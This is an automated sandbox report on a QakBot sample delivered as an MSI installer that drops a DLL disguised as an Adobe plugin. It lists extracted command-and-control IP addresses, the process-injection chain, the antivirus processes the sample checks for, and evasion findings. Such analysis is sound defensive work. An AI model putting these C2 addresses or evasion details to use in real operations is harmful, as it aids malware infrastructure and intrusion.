Source: Malware configuration extractor	IPs: 205.237.67.69:995
Source: Malware configuration extractor	IPs: 83.110.223.61:443
Source: Malware configuration extractor	IPs: 193.253.100.236:2222
Source: Malware configuration extractor	IPs: 27.0.48.233:443
Source: Malware configuration extractor	IPs: 102.159.188.125:443
Source: Malware configuration extractor	IPs: 71.38.155.217:443
Source: Malware configuration extractor	IPs: 58.186.75.42:443
Source: Malware configuration extractor	IPs: 76.178.148.107:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:2087
Source: Malware configuration extractor	IPs: 114.143.176.236:443
Source: Malware configuration extractor	IPs: 51.14.29.227:2222
Source: Malware configuration extractor	IPs: 59.28.84.65:443
Source: Malware configuration extractor	IPs: 173.88.135.179:443
Source: Malware configuration extractor	IPs: 103.144.201.56:2078
Source: Malware configuration extractor	IPs: 96.87.28.170:2222
Source: Malware configuration extractor	IPs: 105.184.103.97:995
Source: Malware configuration extractor	IPs: 176.142.207.63:443
Source: Malware configuration extractor	IPs: 151.62.238.176:443
Source: Malware configuration extractor	IPs: 12.172.173.82:32101
Source: Malware configuration extractor	IPs: 122.186.210.254:443
Source: Malware configuration extractor	IPs: 82.125.44.236:2222
Source: Malware configuration extractor	IPs: 84.108.200.161:443
Source: Malware configuration extractor	IPs: 76.16.49.134:443
Source: Malware configuration extractor	IPs: 70.28.50.223:32100
Source: Malware configuration extractor	IPs: 12.172.173.82:465
Source: Malware configuration extractor	IPs: 76.170.252.153:995
Source: Malware configuration extractor	IPs: 184.182.66.109:443
Source: Malware configuration extractor	IPs: 78.92.133.215:443
Source: Malware configuration extractor	IPs: 50.68.204.71:993
Source: Malware configuration extractor	IPs: 186.75.95.6:443
Source: Malware configuration extractor	IPs: 113.11.92.30:443
Source: Malware configuration extractor	IPs: 70.28.50.223:3389
Source: Malware configuration extractor	IPs: 98.145.23.67:443
Source: Malware configuration extractor	IPs: 85.57.212.13:3389
Source: Malware configuration extractor	IPs: 50.68.186.195:443
Source: Malware configuration extractor	IPs: 47.205.25.170:443
Source: Malware configuration extractor	IPs: 12.172.173.82:993
Source: Malware configuration extractor	IPs: 12.172.173.82:22
Source: Malware configuration extractor	IPs: 69.242.31.249:443
Source: Malware configuration extractor	IPs: 81.101.185.146:443
Source: Malware configuration extractor	IPs: 79.168.224.165:2222
Source: Malware configuration extractor	IPs: 75.143.236.149:443
Source: Malware configuration extractor	IPs: 14.192.241.76:995
Source: Malware configuration extractor	IPs: 86.195.14.72:2222
Source: Malware configuration extractor	IPs: 81.229.117.95:2222
Source: Malware configuration extractor	IPs: 220.240.164.182:443
Source: Malware configuration extractor	IPs: 73.29.92.128:443
Source: Malware configuration extractor	IPs: 12.172.173.82:21
Source: Malware configuration extractor	IPs: 96.56.197.26:2222
Source: Malware configuration extractor	IPs: 75.109.111.89:443
Source: Malware configuration extractor	IPs: 76.86.31.59:443
Source: Malware configuration extractor	IPs: 201.244.108.183:995
Source: Malware configuration extractor	IPs: 68.203.69.96:443
Source: Malware configuration extractor	IPs: 124.122.47.148:443
Source: Malware configuration extractor	IPs: 122.184.143.86:443
Source: Malware configuration extractor	IPs: 92.186.69.229:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:2083
Source: Malware configuration extractor	IPs: 89.129.109.27:2222
Source: Malware configuration extractor	IPs: 147.147.30.126:2222
Source: Malware configuration extractor	IPs: 125.99.76.102:443
Source: Malware configuration extractor	IPs: 88.126.94.4:50000
Source: Malware configuration extractor	IPs: 151.65.167.77:443
Source: Malware configuration extractor	IPs: 86.132.236.117:443
Source: Malware configuration extractor	IPs: 92.154.17.149:2222
Source: Malware configuration extractor	IPs: 223.166.13.95:995
Source: Malware configuration extractor	IPs: 89.36.206.69:995
Source: Malware configuration extractor	IPs: 96.56.197.26:2083
Source: Malware configuration extractor	IPs: 78.18.105.11:443
Source: Malware configuration extractor	IPs: 82.127.153.75:2222
Source: Malware configuration extractor	IPs: 90.78.147.141:2222
Source: Malware configuration extractor	IPs: 82.131.141.209:443
Source: Malware configuration extractor	IPs: 183.87.163.165:443
Source: Malware configuration extractor	IPs: 92.9.45.20:2222
Source: Malware configuration extractor	IPs: 80.6.50.34:443
Source: Malware configuration extractor	IPs: 80.12.88.148:2222
Source: Malware configuration extractor	IPs: 69.133.162.35:443
Source: Malware configuration extractor	IPs: 172.115.17.50:443
Source: Malware configuration extractor	IPs: 95.45.50.93:2222
Source: Malware configuration extractor	IPs: 12.172.173.82:2087
Source: Malware configuration extractor	IPs: 103.140.174.20:2222
Source: Malware configuration extractor	IPs: 24.198.114.130:995
Source: Malware configuration extractor	IPs: 50.68.204.71:443
Source: Malware configuration extractor	IPs: 69.119.123.159:2222
Source: Malware configuration extractor	IPs: 64.121.161.102:443
Source: Malware configuration extractor	IPs: 2.82.8.80:443
Source: Malware configuration extractor	IPs: 184.181.75.148:443
Source: Malware configuration extractor	IPs: 70.112.206.5:443
Source: Malware configuration extractor	IPs: 198.2.51.242:993
Source: Malware configuration extractor	IPs: 2.36.64.159:2078
Source: Malware configuration extractor	IPs: 79.77.142.22:2222
Source: Malware configuration extractor	IPs: 84.215.202.8:443
Source: Malware configuration extractor	IPs: 147.219.4.194:443
Source: Malware configuration extractor	IPs: 116.74.164.81:443
Source: Malware configuration extractor	IPs: 70.28.50.223:2078

Source: unknown

Network traffic detected: IP country count 30

Source: Joe Sandbox View

ASN Name: MEO-RESIDENCIALPT MEO-RESIDENCIALPT

Source: Joe Sandbox View

IP Address: 2.82.8.80 2.82.8.80

Source: rundll32.exe, rundll32.exe, 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp, main.dll.1.dr

String found in binary or memory: https://streams.videolan.org/upload/

Source: 4.2.rundll32.exe.2c90000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 4.2.rundll32.exe.2da0830.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\5334e9.msi

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\5334e7.msi

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000D060	4_2_1000D060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000B0D0	4_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002F110	4_2_1002F110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10008144	4_2_10008144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100101D0	4_2_100101D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001021B	4_2_1001021B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10007270	4_2_10007270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002B270	4_2_1002B270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004B2A5	4_2_1004B2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021340	4_2_10021340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002C390	4_2_1002C390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004D3B0	4_2_1004D3B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004E3E0	4_2_1004E3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002C428	4_2_1002C428
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10013480	4_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000D4D0	4_2_1000D4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004C500	4_2_1004C500
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10025550	4_2_10025550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004D583	4_2_1004D583
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10028590	4_2_10028590
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100105C0	4_2_100105C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1004D5C1	4_2_1004D5C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000164B	4_2_1000164B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10027681	4_2_10027681
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10024700	4_2_10024700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10030741	4_2_10030741
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10010750	4_2_10010750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000E760	4_2_1000E760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021760	4_2_10021760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10010778	4_2_10010778
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002082C	4_2_1002082C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000B830	4_2_1000B830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10032890	4_2_10032890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100218A0	4_2_100218A0

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\r3zg12.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8F685A84-3827-4907-9724-729A0BCDED7E}
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A15EDEFB-4B9B-46D3-AB82-3EBC136071E3}
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{A15EDEFB-4B9B-46D3-AB82-3EBC136071E3}

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF29580D728BC5B4ED.TMP

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winMSI@10/21@0/100

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: main.dll.1.dr

Static PE information: real checksum: 0xe9e0f should be: 0xee24d

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: PID: 4340 base: 63C50 value: E9 63 D7 71 02

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe TID: 2360	Thread sleep count: 176 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 7104	Thread sleep time: -45000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 0.2 %

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10032510 rdtsc

4_2_10032510

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10032510 Start: 100327F5 End: 1003263E

4_2_10032510

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10032510 rdtsc

4_2_10032510

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_1008B030 cpuid

4_2_1008B030

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_1008F660 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress,

4_2_1008F660

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_1009E390 _errno,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,_errno,_errno,

4_2_1009E390

Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 4.2.rundll32.exe.2c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2da0830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2da0830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 4.2.rundll32.exe.2c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2da0830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2da0830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	11 Scripting	1 DLL Side-Loading	11 Process Injection	11 Masquerading	1 Credential API Hooking	2 System Time Discovery	1 Replication Through Removable Media	1 Credential API Hooking	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	2 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Scripting	LSA Secrets	11 Peripheral Device Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
r3zg12.msi	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll	3%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://streams.videolan.org/upload/	rundll32.exe, rundll32.exe, 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp, main.dll.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.82.8.80	unknown	Portugal	3243	MEO-RESIDENCIALPT	true
70.160.67.203	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
75.143.236.149	unknown	United States	20115	CHARTER-20115US	true
83.110.223.61	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
86.195.14.72	unknown	France	3215	FranceTelecom-OrangeFR	true
84.215.202.8	unknown	Norway	41164	GET-NOGETNorwayNO	true
184.182.66.109	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
105.184.103.97	unknown	South Africa	37457	Telkom-InternetZA	true
92.186.69.229	unknown	France	12479	UNI2-ASES	true
174.4.89.3	unknown	Canada	6327	SHAWCA	true
161.142.103.187	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
114.143.176.236	unknown	India	17762	HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdIN	true
14.192.241.76	unknown	Malaysia	9534	MAXIS-AS1-APBinariangBerhadMY	true
173.88.135.179	unknown	United States	10796	TWC-10796-MIDWESTUS	true
84.108.200.161	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	true
47.34.30.133	unknown	United States	20115	CHARTER-20115US	true
183.87.163.165	unknown	India	132220	JPRDIGITAL-INJPRDigitalPvtLtdIN	true
124.149.143.189	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
184.181.75.148	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
84.35.26.14	unknown	Netherlands	21221	INFOPACT-ASTheNetherlandsNL	true
73.29.92.128	unknown	United States	7922	COMCAST-7922US	true
68.203.69.96	unknown	United States	11427	TWC-11427-TEXASUS	true
82.131.141.209	unknown	Hungary	20845	DIGICABLEHU	true
64.121.161.102	unknown	United States	6079	RCN-ASUS	true
178.175.187.254	unknown	Moldova Republic of	43289	TRABIAMD	true
96.56.197.26	unknown	United States	6128	CABLE-NET-1US	true
186.64.67.30	unknown	Argentina	27953	NODOSUDSAAR	true
188.28.19.84	unknown	United Kingdom	206067	H3GUKGB	true
125.99.76.102	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	true
81.101.185.146	unknown	United Kingdom	5089	NTLGB	true
86.176.144.234	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
59.28.84.65	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
76.86.31.59	unknown	United States	20001	TWC-20001-PACWESTUS	true
147.147.30.126	unknown	United Kingdom	6871	PLUSNETUKInternetServiceProviderGB	true
96.87.28.170	unknown	United States	7922	COMCAST-7922US	true
75.109.111.89	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	true
78.92.133.215	unknown	Hungary	5483	MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHU	true
124.122.47.148	unknown	Thailand	17552	TRUE-AS-APTrueInternetCoLtdTH	true
88.126.94.4	unknown	France	12322	PROXADFR	true
51.14.29.227	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
85.57.212.13	unknown	Spain	12479	UNI2-ASES	true
47.205.25.170	unknown	United States	5650	FRONTIER-FRTRUS	true
95.45.50.93	unknown	Ireland	5466	EIRCOMInternetHouseIE	true
80.12.88.148	unknown	France	3215	FranceTelecom-OrangeFR	true
